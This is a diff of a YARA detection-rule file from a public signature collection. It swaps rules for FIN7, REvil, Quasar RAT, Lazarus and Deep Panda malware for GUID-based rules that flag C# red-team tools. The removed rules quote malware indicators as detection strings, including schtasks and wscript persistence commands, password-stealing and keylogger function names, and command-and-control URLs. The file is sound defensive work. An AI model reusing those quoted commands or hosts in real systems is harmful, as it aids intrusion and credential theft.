-rule SIGNATURE_BASE_FIN7_Dropper_Aug17 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Limelogger : FILE
 {
 	meta:
-		description = "Detects Word Dropper from Proofpoint FIN7 Report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4929dff6-9f33-5d22-b560-c2195440a1cc"
-		date = "2017-08-04"
-		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7_backdoor.yar#L12-L32"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0798f01b-76b7-5c4d-9ddb-5e377b86f8b9"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/NYAN-x-CAT/LimeLogger"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L298-L312"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "610b7288e08d36858de88abac3a86dcb6ebba1c019e17fb716f5c26aa964903b"
+		logic_hash = "1afc5f5f236d66374f5c53f770e8284867632b0373de00283175ed1d424bfa4b"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c91642c0a5a8781fff9fd400bff85b6715c96d8e17e2d2390c1771c683c7ead9"
-		hash2 = "cf86c7a92451dca1ebb76ebd3e469f3fa0d9b376487ee6d07ae57ab1b65a86f8"
 
 	strings:
-		$x1 = "tpircsj:e/ b// exe.tpircsw\" rt/" fullword ascii
-		$s1 = "Scripting.FileSystemObject$" fullword ascii
-		$s2 = "PROJECT.THISDOCUMENT.AUTOOPEN" fullword wide
-		$s3 = "Project.ThisDocument.AutoOpen" fullword wide
-		$s4 = "\\system3" ascii
-		$s5 = "ShellV" fullword ascii
+		$typelibguid0lo = "068d14ef-f0a1-4f9d-8e27-58b4317830c6" ascii wide
+		$typelibguid0up = "068D14EF-F0A1-4F9D-8E27-58B4317830C6" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0xcfd0 and filesize < 700KB and 1 of ( $x* ) or all of ( $s* ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_FIN7_Backdoor_Aug17 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Aggressorscripts : FILE
 {
 	meta:
-		description = "Detects Word Dropper from Proofpoint FIN7 Report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "906daf88-520b-57b5-825e-29f060b43183"
-		date = "2017-08-04"
-		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7_backdoor.yar#L34-L74"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "d5903db5-010b-5b9d-8a5b-5d61aec52e7a"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/harleyQu1nn/AggressorScripts"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L314-L328"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "76818317c543c1464898463741ddaf8c6368d0f5004c088a323c4323db49060c"
+		logic_hash = "33982f1f91aa61c54f7c60236389ed78e0a23be5fc04abce6c6574e067522a23"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "wscript.exe //b /e:jscript C:\\Users\\" ascii
-		$x2 = "wscript.exe /b /e:jscript C:\\Users\\" ascii
-		$x3 = "schtasks /Create /f /tn \"GoogleUpdateTaskMachineSystem\" /tr \"wscript.exe" ascii nocase
-		$x4 = "schtasks /Delete /F /TN \"\"GoogleUpdateTaskMachineCore" ascii nocase
-		$x5 = "schtasks /Delete /F /TN \"GoogleUpdateTaskMachineCore" ascii nocase
-		$x6 = "wscript.exe //b /e:jscript %TMP%\\debug.txt" ascii
-		$s1 = "/?page=wait" fullword ascii
-		$a1 = "autoit3.exe" fullword ascii
-		$a2 = "dumpcap.exe" fullword ascii
-		$a3 = "tshark.exe" fullword ascii
-		$a4 = "prl_cc.exe" fullword ascii
-		$v1 = "vmware" fullword ascii
-		$v2 = "PCI\\\\VEN_80EE&DEV_CAFE" fullword ascii
-		$v3 = "VMWVMCIHOSTDEV" fullword ascii
-		$c1 = "apowershell" fullword ascii
-		$c2 = "wpowershell" fullword ascii
-		$c3 = "get_passwords" fullword ascii
-		$c4 = "kill_process" fullword ascii
-		$c5 = "get_screen" fullword ascii
+		$typelibguid0lo = "afd1ff09-2632-4087-a30c-43591f32e4e8" ascii wide
+		$typelibguid0up = "AFD1FF09-2632-4087-A30C-43591F32E4E8" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 5000KB and ( 1 of ( $x* ) or all of ( $a* ) or all of ( $v* ) or 3 of ( $c* ) ) ) or 5 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_MAL_RANSOM_Revil_Oct20_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Gopher : FILE
 {
 	meta:
-		description = "Detects REvil ransomware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0c85a2cc-3487-577f-bd12-e3effd8fc811"
-		date = "2020-10-13"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_ransom_revil.yar#L2-L23"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e3015719-9085-584d-8237-f377ec995149"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/EncodeGroup/Gopher"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L330-L344"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "756e49362c01abbca3208967630f09ed957e5c51956e0e5210b0167590582a82"
+		logic_hash = "f17688d229c74f0f956a45d9eacfa2bb190c973c097bc870db96edc5c331f436"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "5966c25dc1abcec9d8603b97919db57aac019e5358ee413957927d3c1790b7f4"
-		hash2 = "f66027faea8c9e0ff29a31641e186cbed7073b52b43933ba36d61e8f6bce1ab5"
-		hash3 = "f6857748c050655fb3c2192b52a3b0915f3f3708cd0a59bbf641d7dd722a804d"
-		hash4 = "fc26288df74aa8046b4761f8478c52819e0fca478c1ab674da7e1d24e1cfa501"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$op1 = { 0f 8c 74 ff ff ff 33 c0 5f 5e 5b 8b e5 5d c3 8b }
-		$op2 = { 8d 85 68 ff ff ff 50 e8 2a fe ff ff 8d 85 68 ff }
-		$op3 = { 89 4d f4 8b 4e 0c 33 4e 34 33 4e 5c 33 8e 84 }
-		$op4 = { 8d 85 68 ff ff ff 50 e8 05 06 00 00 8d 85 68 ff }
-		$op5 = { 8d 85 68 ff ff ff 56 57 ff 75 0c 50 e8 2f }
+		$typelibguid0lo = "b5152683-2514-49ce-9aca-1bc43df1e234" ascii wide
+		$typelibguid0up = "B5152683-2514-49CE-9ACA-1BC43DF1E234" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and 2 of them or 4 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Quasar_RAT_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Aviator : FILE
 {
 	meta:
-		description = "Detects Quasar RAT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "36220de3-aa1a-5c34-adae-432d939c811e"
-		date = "2017-04-07"
-		modified = "2023-12-05"
-		reference = "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_quasar_rat.yar#L10-L33"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "52acd520-52aa-5bb9-ab3b-66a940aa5f5a"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/Ch0pin/AVIator"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L346-L360"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7cceccb7c283774318f6285b482a422566f4f821eb51d564104205783401931a"
+		logic_hash = "4b25128df5cdc26152494f39656546974b3b04c5e4ec7d3084e27d0f6baf4ca0"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740"
-		hash2 = "1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec"
-		hash3 = "515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89"
-		hash4 = "f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34"
 
 	strings:
-		$s1 = "DoUploadAndExecute" fullword ascii
-		$s2 = "DoDownloadAndExecute" fullword ascii
-		$s3 = "DoShellExecute" fullword ascii
-		$s4 = "set_Processname" fullword ascii
-		$op1 = { 04 1e fe 02 04 16 fe 01 60 }
-		$op2 = { 00 17 03 1f 20 17 19 15 28 }
-		$op3 = { 00 04 03 69 91 1b 40 }
+		$typelibguid0lo = "4885a4a3-4dfa-486c-b378-ae94a221661a" ascii wide
+		$typelibguid0up = "4885A4A3-4DFA-486C-B378-AE94A221661A" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 5000KB and all of ( $s* ) or all of ( $op* ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Quasar_RAT_2 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Njcrypter : FILE
 {
 	meta:
-		description = "Detects Quasar RAT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0ca795c5-3631-5a99-8675-37558485f478"
-		date = "2017-04-07"
-		modified = "2023-12-05"
-		reference = "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_quasar_rat.yar#L35-L59"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "c30c8323-9418-521a-a4fc-6be0113b99b5"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/0xPh0enix/njCrypter"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L362-L378"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b113cb63b0bb75766c905dd3b327b1b2df228733622df8f7517d3daed72432a3"
+		logic_hash = "3fafad2f64c931394f9deddc1751da8286d7ba7727c3505fbc20cf8c4226971a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740"
-		hash2 = "515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89"
-		hash3 = "f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34"
 
 	strings:
-		$x1 = "GetKeyloggerLogsResponse" fullword ascii
-		$x2 = "get_Keylogger" fullword ascii
-		$x3 = "HandleGetKeyloggerLogsResponse" fullword ascii
-		$s1 = "DoShellExecuteResponse" fullword ascii
-		$s2 = "GetPasswordsResponse" fullword ascii
-		$s3 = "GetStartupItemsResponse" fullword ascii
-		$s4 = "<GetGenReader>b__7" fullword ascii
-		$s5 = "RunHidden" fullword ascii
+		$typelibguid0lo = "8a87b003-4b43-467b-a509-0c8be05bf5a5" ascii wide
+		$typelibguid0up = "8A87B003-4B43-467B-A509-0C8BE05BF5A5" ascii wide
+		$typelibguid1lo = "80b13bff-24a5-4193-8e51-c62a414060ec" ascii wide
+		$typelibguid1up = "80B13BFF-24A5-4193-8E51-C62A414060EC" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 5000KB and $x1 ) or ( all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_MAL_Quasarrat_May19_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpminidump : FILE
 {
 	meta:
-		description = "Detects QuasarRAT malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a4e82b6a-31f8-59fc-acfa-805c4594680a"
-		date = "2019-05-27"
-		modified = "2023-01-06"
-		reference = "https://blog.ensilo.com/uncovering-new-activity-by-apt10"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_quasar_rat.yar#L61-L89"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e91e6711-d992-5a8a-97e6-1ed7847f38a4"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/b4rtik/SharpMiniDump"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L380-L394"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a189bce433c71d45fd7f5d7fc284fc5b35c88a7ec616dd392d0e931165263aca"
+		logic_hash = "9ef422dfd066c4fff7e3e72758557bcac81883ae75f0bf0c8efc14a127e12acf"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded"
-
-	strings:
-		$x1 = "Quasar.Common.Messages" ascii fullword
-		$x2 = "Client.MimikatzTools" ascii fullword
-		$x3 = "Resources.powerkatz_x86.dll" ascii fullword
-		$x4 = "Uninstalling... good bye :-(" wide
-		$xc1 = { 41 00 64 00 6D 00 69 00 6E 00 00 11 73 00 63 00
-               68 00 74 00 61 00 73 00 6B 00 73 00 00 1B 2F 00
-               63 00 72 00 65 00 61 00 74 00 65 00 20 00 2F 00
-               74 00 6E 00 20 00 22 00 00 27 22 00 20 00 2F 00
-               73 }
-		$xc2 = { 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20
-               00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C
-               00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E
-               00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20
-               00 2F 00 61 00 20 00 2F 00 71 00 20 00 2F 00 66
-               00 20 00 }
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 10000KB and 1 of them
-}
-
-rule SIGNATURE_BASE_APT_Lazarus_Dropper_Jun18_1 : FILE
-{
-	meta:
-		description = "Detects Lazarus Group Dropper"
-		author = "Florian Roth (Nextron Systems)"
-		id = "226be9d4-93c0-5512-9667-3388cd6f20d4"
-		date = "2018-06-01"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/DrunkBinary/status/1002587521073721346"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_jun18.yar#L13-L32"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "868297209177471f29c9653747d3205f55a14b74a5da64562b20ebeadb14b1cf"
-		score = 60
-		quality = 40
-		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "086a50476f5ceee4b10871c1a8b0a794e96a337966382248a8289598b732bd47"
-		hash2 = "9f2d4fd79d3c68270102c4c11f3e968c10610a2106cbf1298827f8efccdd70a9"
 
 	strings:
-		$s1 = /%s\\windows10-kb[0-9]{7}.exe/ fullword ascii
-		$s2 = "EYEJIW" fullword ascii
-		$s3 = "update" fullword wide
+		$typelibguid0lo = "6ffccf81-6c3c-4d3f-b15f-35a86d0b497f" ascii wide
+		$typelibguid0up = "6FFCCF81-6C3C-4D3F-B15F-35A86D0B497F" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 21000KB and ( pe.imphash ( ) == "fcac768eff9896d667a7c706d70712ce" or all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_Lazarus_RAT_Jun18_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Cinarat : FILE
 {
 	meta:
-		description = "Detects Lazarus Group RAT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "fd394d15-70c5-543a-a845-2058f296b5f8"
-		date = "2018-06-01"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/DrunkBinary/status/1002587521073721346"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_jun18.yar#L34-L66"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "c6b4c919-0fc6-5096-b29b-963142a2c831"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/wearelegal/CinaRAT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L396-L412"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7260f766ffd1122319ca69a6c87b0baa98d5727929f2e063a5b2edb05a44d827"
+		logic_hash = "10b086a6472ebad3bc3ab3fe41fb1869632aa94f4fe44446fa1fa7d97abf3ce6"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c10363059c57c52501c01f85e3bb43533ccc639f0ea57f43bae5736a8e7a9bc8"
-		hash2 = "e98991cdd9ddd30adf490673c67a4f8241993f26810da09b52d8748c6160a292"
 
 	strings:
-		$a1 = "www.marmarademo.com/include/extend.php" fullword ascii
-		$a2 = "www.33cow.com/include/control.php" fullword ascii
-		$a3 = "www.97nb.net/include/arc.sglistview.php" fullword ascii
-		$c1 = "Content-Disposition: form-data; name=\"file1\"; filename=\"example.dat\"" fullword ascii
-		$c2 = "Content-Disposition: form-data; name=\"file1\"; filename=\"pratice.pdf\"" fullword ascii
-		$c3 = "Content-Disposition: form-data; name=\"file1\"; filename=\"happy.pdf\"" fullword ascii
-		$c4 = "Content-Disposition: form-data; name=\"file1\"; filename=\"my.doc\"" fullword ascii
-		$c5 = "Content-Disposition: form-data; name=\"board_id\"" fullword ascii
-		$s1 = "Winhttp.dll" fullword ascii
-		$s2 = "Wsock32.dll" fullword ascii
-		$s3 = "WM*.tmp" fullword ascii
-		$s4 = "FM*.tmp" fullword ascii
-		$s5 = "Cache-Control: max-age=0" fullword ascii
+		$typelibguid0lo = "8586f5b1-2ef4-4f35-bd45-c6206fdc0ebc" ascii wide
+		$typelibguid0up = "8586F5B1-2EF4-4F35-BD45-C6206FDC0EBC" ascii wide
+		$typelibguid1lo = "fe184ab5-f153-4179-9bf5-50523987cf1f" ascii wide
+		$typelibguid1up = "FE184AB5-F153-4179-9BF5-50523987CF1F" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( 1 of ( $a* ) or 2 of ( $c* ) or 4 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_Lazarus_RAT_Jun18_2 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Toxiceye : FILE
 {
 	meta:
-		description = "Detects Lazarus Group RAT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4f2e280e-ed76-5fb9-b137-5191bbea2155"
-		date = "2018-06-01"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/DrunkBinary/status/1002587521073721346"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_jun18.yar#L68-L83"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0b7b62ce-9c24-5d81-8d87-22f6e461a62b"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/LimerBoy/ToxicEye"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L414-L428"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b22b8386791e86f787efc40a394bbabdb4a009fc2d1a7b87aaf5039fc977a5bd"
+		logic_hash = "29c8be9e1500ff5799e7527482131e28dcea66077958d2c30126415769ad6ee0"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e6096fb512a6d32a693491f24e67d772f7103805ad407dc37065cebd1962a547"
 
 	strings:
-		$s1 = "\\KB\\Release\\" ascii
-		$s3 = "KB, Version 1.0" fullword wide
-		$s4 = "TODO: (c) <Company name>.  All rights reserved." fullword wide
+		$typelibguid0lo = "1bcfe538-14f4-4beb-9a3f-3f9472794902" ascii wide
+		$typelibguid0up = "1BCFE538-14F4-4BEB-9A3F-3F9472794902" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5000KB and 2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Beepservice_Hacktool : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Disable_Windows_Defender : FILE
 {
 	meta:
-		description = "Detects BeepService Hacktool used by Chinese APT groups"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8813a01a-10db-52e7-bb1e-322864e87b15"
-		date = "2016-05-12"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/p32Ozf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_beepservice.yar#L10-L31"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "9a673427-e66e-594b-942a-64a2272319f3"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/NYAN-x-CAT/Disable-Windows-Defender"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L430-L444"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "176136e8a5ffec258caebf8d6b452b556093c5998414a7c9a4451ad78482f862"
-		score = 85
+		logic_hash = "eeabc349036a73e65f81558e5e447c69a68161d487d0991a808800135287a67c"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "032df812a68852b6f3822b9eac4435e531ca85bdaf3ee99c669134bd16e72820"
-		hash2 = "e30933fcfc9c2a7443ee2f23a3df837ca97ea5653da78f782e2884e5a7b734f7"
-		hash3 = "ebb9c4f7058e19b006450b8162910598be90428998df149977669e61a0b7b9ed"
-		hash4 = "6db2ffe7ec365058f9d3b48dcca509507c138f19ade1adb5f13cf43ea0623813"
-
-	strings:
-		$x1 = "\\\\%s\\admin$\\system32\\%s" fullword ascii
-		$s1 = "123.exe" fullword ascii
-		$s2 = "regclean.exe" fullword ascii
-		$s3 = "192.168.88.69" fullword ascii
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and $x1 and 1 of ( $s* )
-}
-rule SIGNATURE_BASE_Deeppanda_Sl_Txt_Packed
-{
-	meta:
-		description = "Hack Deep Panda - ScanLine sl-txt-packed"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7a335810-2bf9-5a0b-bef4-1bade65a0f00"
-		date = "2015-02-08"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_deeppanda.yar#L3-L22"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ffb1d8ea3039d3d5eb7196d27f5450cac0ea4f34"
-		logic_hash = "37f875dcb2c920278c2625085c97a9dcce1907198409595a10e6a3fbce767f35"
-		score = 75
-		quality = 60
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Command line port scanner" fullword wide
-		$s1 = "sl.exe" fullword wide
-		$s2 = "CPports.txt" fullword ascii
-		$s3 = ",GET / HTTP/.}" fullword ascii
-		$s4 = "Foundstone Inc." fullword wide
-		$s9 = " 2002 Foundstone Inc." fullword wide
-		$s15 = ", Inc. 2002" fullword ascii
-		$s20 = "ICMP Time" fullword ascii
+		$typelibguid0lo = "501e3fdc-575d-492e-90bc-703fb6280ee2" ascii wide
+		$typelibguid0up = "501E3FDC-575D-492E-90BC-703FB6280EE2" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Deeppanda_Lot1
+rule SIGNATURE_BASE_HKTL_NET_GUID_Dinvoke_Poc : FILE
 {
 	meta:
-		description = "Hack Deep Panda - lot1.tmp-pwdump"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c72120a5-8637-580c-9856-e070dfb6df94"
-		date = "2015-02-08"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_deeppanda.yar#L24-L49"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "f3b0ef47-a92c-5c5d-a9e2-09579fcb438e"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/dtrizna/DInvoke_PoC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L446-L460"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5d201a0fb0f4a96cefc5f73effb61acff9c818e1"
-		logic_hash = "92169a1288f30dc6008e1a8c9b2b700f878c90aa09634e36fea586e19657dbd1"
+		logic_hash = "c72125f272d18801c36a4f5f8c877ae5ecf3a81bd9e58113ce79f2311c455c65"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Unable to open target process: %d, pid %d" fullword ascii
-		$s1 = "Couldn't delete target executable from remote machine: %d" fullword ascii
-		$s2 = "Target: Failed to load SAM functions." fullword ascii
-		$s5 = "Error writing the test file %s, skipping this share" fullword ascii
-		$s6 = "Failed to create service (%s/%s), error %d" fullword ascii
-		$s8 = "Service start failed: %d (%s/%s)" fullword ascii
-		$s12 = "PwDump.exe" fullword ascii
-		$s13 = "GetAvailableWriteableShare returned an error of %ld" fullword ascii
-		$s14 = ":\\\\.\\pipe\\%s" fullword ascii
-		$s15 = "Couldn't copy %s to destination %s. (Error %d)" fullword ascii
-		$s16 = "dump logon session" fullword ascii
-		$s17 = "Timed out waiting to get our pipe back" fullword ascii
-		$s19 = "SetNamedPipeHandleState failed, error %d" fullword ascii
